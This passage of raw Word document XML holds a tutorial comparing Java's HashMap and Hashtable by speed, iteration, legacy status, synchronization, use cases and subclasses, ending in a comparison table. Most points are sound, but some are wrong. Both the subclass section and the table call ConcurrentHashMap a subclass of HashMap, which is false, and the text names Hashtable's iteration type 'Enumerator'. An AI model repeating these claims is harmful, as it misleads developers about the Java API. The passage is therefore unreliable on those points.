          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486BA648" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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lower</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Due to synchronization, Hashtable tends to be slower than HashMap for most operations in multi-threaded scenarios. The overhead of synchronization reduces its performance in comparison to HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6E628" w14:textId="77777777" w:rsidR="00121FDE"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67D8177">
          <v:rect id="_x0000_i1454" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="234869BE" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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Iterator vs Enumerator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D765E" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82AD8C" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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terator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to iterate over the entries. The Iterator is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fail-fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning it will throw a ConcurrentModificationException if the map is modified while iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F488C94" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D45F6DD" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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numerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hashtable uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enumerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to iterate over the entries, which is considered obsolete. It does not support the fail-fast behavior like Iterator. In addition, Hashtable also provides a keySet() method for iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C41BF" w14:textId="77777777" w:rsidR="00121FDE"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17DC6BEE">
          <v:rect id="_x0000_i1455" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712FE78" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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Legacy vs Modern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB949BD" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154EB327" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68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odern Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HashMap is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, introduced in Java 1.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B8A55" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123683F9" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68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egacy Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hashtable is considered a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>legacy class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It was part of the original version of Java, introduced in Java 1.0. It has been largely replaced by newer classes like HashMap, though it is still available for backward compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5071978F" w14:textId="77777777" w:rsidR="00121FDE"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2537B0">
          <v:rect id="_x0000_i1456" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D03A51" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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Synchronization Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5A0872" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02E124" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Built-in Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashMap does not provide synchronization, so you must manually handle thread safety (e.g., using Collections.synchronizedMap() or other concurrency mechanisms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15841938" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C825A1" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ynchronized by Default</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hashtable provides automatic synchronization, which ensures thread safety but may lead to performance issues due to locking overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24585261" w14:textId="77777777" w:rsidR="00121FDE"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4D65DE9">
          <v:rect id="_x0000_i1457" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D1240" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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7. Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C92183C" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB8A0B8" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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commended for Single-Threaded</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Externally Synchronized Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use HashMap for most modern applications, especially when thread safety is not a primary concern or is managed externally (e.g., using ConcurrentHashMap for multi-threaded environments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA947A" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1ED9CD" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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egacy Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use Hashtable only when maintaining compatibility with legacy code that requires its specific behavior. It's rarely used in new code due to its performance drawbacks and thread synchronization issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169639E8" w14:textId="77777777" w:rsidR="00121FDE"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DDA0F7">
          <v:rect id="_x0000_i1458" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C38481C" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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8. Subclasses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363310F2" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601DE549" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68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ubclasses</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashMap has subclasses like LinkedHashMap and ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F20565" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5F8C3" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68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ubclasses</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hashtable has subclasses like Properties (which is used for storing key-value pairs in a more specific manner, often for configuration purposes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E54175" w14:textId="77777777" w:rsidR="00121FDE"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774FE2A">
          <v:rect id="_x0000_i1459" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CFF91" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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Quick Comparison Tab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4"/>
        <w:gridCol w:w="4226"/>
        <w:gridCol w:w="3564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="678FB3A5" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78B54440" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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5D083EA3" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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ashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2057E8EE" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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ashtable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6B584C29" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EEBC232"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Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0585B84E"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t thread-safe (not synchronized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75FC4E64"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read-safe (synchronized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="631BEFCF" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="356EA839"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ull Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="713858C3"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lows one null key and multiple null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B22AAD"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oes not allow null keys or values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="271EE7E1" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41CBC48C"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="413FFB5D"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aster (for single-threaded or externally synchronized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E9AE3B8"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lower due to synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="26B6B63C" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67B27B00"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terator/Enumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4525AE27"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s Iterator (fail-fast)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5196F15F"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s Enumerator (no fail-fast)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="45BCE229" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A79E4C7"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egacy/Modern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="414A7CFC"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dern class (Java 1.2 and onwards)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61A9AF74"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egacy class (Java 1.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="0C7A84F4" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A3D23BF"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ynchronization Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169142F6"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synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC2927C"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uilt-in synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="17FBC76F" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="534B3950"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07E2A681"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st for non-thread-safe operations or externally synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D1A60AE"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st for legacy code, not recommended for new code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7367D8B5" w14:textId="77777777" w:rsidTr="007A7B74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="311EA718"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ubclasses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFD1F47"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nkedHashMap, ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA5E5A6"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operties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71F19BED" w14:textId="77777777" w:rsidR="00121FDE"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479AAD">
